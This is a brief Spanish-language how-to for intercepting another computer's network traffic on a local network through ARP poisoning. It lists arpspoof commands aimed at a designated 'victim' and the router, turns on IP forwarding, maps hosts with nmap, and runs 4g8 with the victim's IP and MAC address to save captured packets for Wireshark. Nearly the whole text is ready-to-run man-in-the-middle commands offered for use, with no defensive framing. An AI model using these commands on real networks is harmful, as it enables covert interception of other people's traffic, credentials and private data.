Capturar paquetes de equipos de una red. Previamente preparar el equipo con los pasos previos para el envenenamiento arp lanzando en dos terminales y sin cerrarlas hasta terminar la captura:
# arpspoof -i eth0 -t 192.168.1.12 192.168.1.1
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.12
El "2" el sniffado, el "1" el router y el -i … la red. El paquete que contiene arpspoof es dsniff. Activar forwarding para que los paquetes vayan a su verdadero dueño:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Para conocer los parámetros [ips y MACs] que luego tendremos que entrar en 4g8 lanzar:
# nmap 192.168.1.0/24
Para conocer los equipos de la red. Una vez escogida la victima, lanzar 4g8:
# 4g8 -i eth0 -g 192.168.1.1 -G 64:69:0C:87:A8:DC -s 192.168.1.12 -S 00:19:01:54:F5:1F -w dump.pcap
-g (ip del router)
-G (MAC del router)
-s (ip de la victima)
-S (MAC de la victima)
-w (archivo donde guardar las capturas)
Para el análisis del archivo dump.pcap se puede usar wireshark entre otros.